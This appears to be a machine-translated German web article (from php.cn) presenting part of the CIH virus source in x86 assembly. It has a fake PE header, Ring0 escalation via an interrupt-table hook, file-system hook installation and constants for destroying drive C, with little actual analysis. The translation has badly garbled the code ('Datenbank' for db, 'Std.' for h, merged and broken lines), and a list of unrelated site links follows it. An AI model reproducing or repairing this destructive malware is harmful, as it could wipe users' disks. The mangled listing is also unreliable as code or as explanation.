Analyse von Beispielen für den Quellcode von Virenprogrammen – CIH-Virus[2]
OriginalAppEXE SEGMENT
;Header der ausführbaren Datei im PE-Format
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 0. 04h , 000h , 000h, 000h, 0ffh, 0ffh, 000h, 000h
DB 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db. 000h, 000h, 000h, 000h, 080h 000h, 000h, 000h 068h
db 061h , 06dh, 0 20h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh 🎜> db 06dh, 06fh, 064h, 0 65h, 02eh, 00dh, 00dh , 00ah db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h h, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db. 000 Std., 000 Std., 000 Std., 000 Std., 000 Std , 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
Datenbank 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 002h, 000h, 000h
Datenbank 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
Datenbank 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h Datenbank 000h, 000h, 010h, 000h, 000, 010, 000, 000 0h, 000h, 000h
db 000h ,000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h, 000h, 000h, 000h 000h 00h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
Datenbank 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h h, 000h, 000h, 000h
DB 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
DB 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
DB 00 0h, 010 Std., 000 Std., 000 Std., 000 Std , 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h db 000h, 000h, 000h, 000h, 000h , 000h, 000h, 000h
db 000h ,000h, 000h, 000h, 000h, 000h, 000h, 000h 00h, 000h, 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h. , 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h , 000h
db 000h, 000h, 000h , 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd 00000000h, VirusSize
OriginalAppEXE ENDS
; Virenprogramm startet
TRUE = 1
FALSE = 0
DEBUG = FALSE
; Markieren Sie seine Versionsnummer als Version 1.4
MajorVirusVersion = 1; Hauptversionsnummer
MinorVirusVersion = 4; Nebenversionsnummer
VirusVersion = MajorVirusVersion*10h+MinorVirusVersion; Synthetische Versionsnummer
IF DEBUG;Ob debuggen?
FirstKillHardDiskNumber = 81h;Laufwerk D zerstören
HookExceptionNumber = 05h ; Interrupt-Nummer 5 verwenden
ELSE
FirstKillHardDiskNumber = 80h ; Laufwerk C zerstören
HookxceptionNumber = 03h ; Interrupt-Nummer 3 verwenden
FileNameBufferSize = 7fh
; Virencode-Segment beginnt
VirusGame-SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame
> MyVirusStart :
push ebp
; Systemausnahmebehandlung ändern, um die Generierung von Fehlermeldungen zu vermeiden
lea eax, [esp-04h*2]
xor ebx, ebx
xchg eax , fs: [ebx]
call @0
@0:
pop ebx; Verwenden Sie diesen Offset + relativen Offset, um die absolute Adresse
lea zu erhalten ecx, StopToRunVirusCode-@0[ebx]
push ecx
push eax
; Ändern Sie die Interrupt-Beschreibungstabelle, um die höchste Ring0-Berechtigung zu erhalten
push eax
sidt [esp- 02h] ; Basisadresse der Interrupt-Beschreibungstabelle für ebx abrufen
pop ebx ; add ebx, HookExceptionNumber*08h+04h ; Berechnen Sie die Basisadresse des Interrupts, der für ebx verwendet werden soll
cli ;Interrupts vor dem Ändern ausschalten
esi, MyExceptionHook-@1[ecx]
push esi ist die Adresse der Viren-Interrupt-Routine
mov [ebx-04h] , si;
shr esi, 16; Ändern Sie die Ausnahme
mov [ebx+02h], si ; Ändern Sie die Interrupt-Basisadresse, um auf die Virus-Interrupt-Routine zu verweisen
pop esi
; Erzeuge eine Ausnahme, die in die Ring0-Ebene eintritt
int HookExceptionNumber ; to Interrupt, um in die Ring0-Ebene einzutreten
ReturnAddressOfEndException = $
; Alle Virencodes zusammenführen
push esi
mov esi, eax; esi zeigt auf den Anfang des Virus
; Loop Copy
LoopOfMergeAllVirusCodeSection:
mov ecx, [eax-04h]
rep movsb ; erste Adresse des zugewiesenen Systemspeichers
sub eax, 08h
mov esi, [eax]
or esi, esi
jz QuitLoopOfMergeAllVirusCodeSection; ZF = 1
jmp LoopOfMergeAllVirusCodeSection;Copy the nächster Absatz
QuitLoopOfMergeAllVirusCodeSection:
pop esi
int HookExceptionNumber
; Ausnahmebehandlung speichern
ReadyRestoreSE:
sti;Open interrupt
xor ebx, ebx, Der Virus stoppt die Ausführung und springt direkt zum ursprünglichen Programm
StopToRunVirusCode:
@1 = StopToRunVirusCode
xor ebx, ebx
mov eax, fs:[ebx]
mov esp , [eax]
RestoreSE:
pop dword ptr fs:[ebx]
pop eax
; Zum Originalprogramm springen und normal ausführen
pop ebp
push 00401000h
OriginalAddressOfEntryPoint = $-4;Schiebt die Startadresse des Originalprogramms auf den Stapel
ret;Kehrt als Unterprogramm zum Anfang des Originalprogramms zurück
; Virus-Initialisierungsmodul
MyExceptionHook:
@2 = MyExceptionHook
jz InstallMyFileSystemApiHook; Wenn der Virencode kopiert wurde
; Gehen Sie zum Programm, um den System-Hook zu installieren
mov ecx , dr0 ; Überprüfen Sie, ob dr0 gesetzt wurde (dr0 ist das Virus-Residenz-Flag)
jecxz AllocateSystemMemoryPage ; Wenn nicht gesetzt, ordnen Sie Systemspeicher zu
fügen Sie dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
Zurück zum ursprünglichen Programm
ExitRing0Init:
mov [ebx-04h], bp ; Shr ebp, 16 ; Restore Exception
mov [ebx+02h], bp ; ursprüngliche Interrupt-Basisadresse
iretd;Interrupt-Rückgabe
;Zu verwendenden Systemspeicher zuweisen
AllocateSystemMemoryPage:
mov dr0, ebx;Setzen Sie das Flag der Virenresidenz dr0
push 00000000fh ;
push ecx ;
push 0ffffffffh ;
push ecx ;Call method ULONG EXTERN _PageAllocate(ULONG nPages,
; ULONG VM, ULONG AlignMask,
; $
dd 00010053h;Eax-, ecx-, edx- und Flag-Register verwenden
esp hinzufügen, 08h*04h;Stapelzeiger wiederherstellen
xchg edi, eax;edi zeigt auf die erste Adresse des zugewiesenen Systemspeichers
lea eax , MyVirusStart-@2[esi] ;eax zeigt auf den Start des Virus
iretd ;Interrupt beenden
; Initialisieren Sie den Dateisystem-Hook
InstallMyFileSystemApiHook:
lea eax , FileSystemApiHook-@6 [edi] ; Zeigen Sie auf die erste Adresse des Dateisystem-Hook-Programms
push eax;
int 20h; Vxd ruft IFSMgr_InstallFileSystemApiHook
dd 00 auf 400067h; Verwenden Sie eax, ecx, edx und flags register
mov dr0, eax; Speichern Sie die erste Adresse des ursprünglichen Dateisystem-Hook-Programms in dr0
pop eax entspricht der ersten Adresse des Dateisystem-Hook-Programms
; Speichern Sie den ursprünglichen IFSMgr_InstallFileSystemApiHook-Funktionsaufruf-Eintrag
mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
mov edx, [ecx] ;edx ist der Eintrag von IFSMgr_InstallFileSystemApiHook
mov OldInstallFileSystemApiHook-@3[ eax], edx
; IFSMGR_INSTALLFILESYSTEMAPIHOOK-Eingang ändern
Lea Eax, InstallfileSystemapihook-@3 [Eax]
; um auf InstallfileSystemapihook
zu verweisen;
Das Obige ist der Inhalt der Beispielanalyse des Virenprogramm-Quellcodes – CIH-Virus [2]. Weitere verwandte Inhalte finden Sie auf der chinesischen PHP-Website (www.php.cn). )!
navigator.appname
Einführung in das xmpp-Protokoll
Der Unterschied zwischen statischen Webseiten und dynamischen Webseiten
Der Dateiname enthält illegalen Inhalt
Was ist das Funktionsprinzip und der Prozess von Mybatis?
So lösen Sie err_connection_reset
Einschaltkennwort in XP aufheben
Was bedeutet XML-Format?
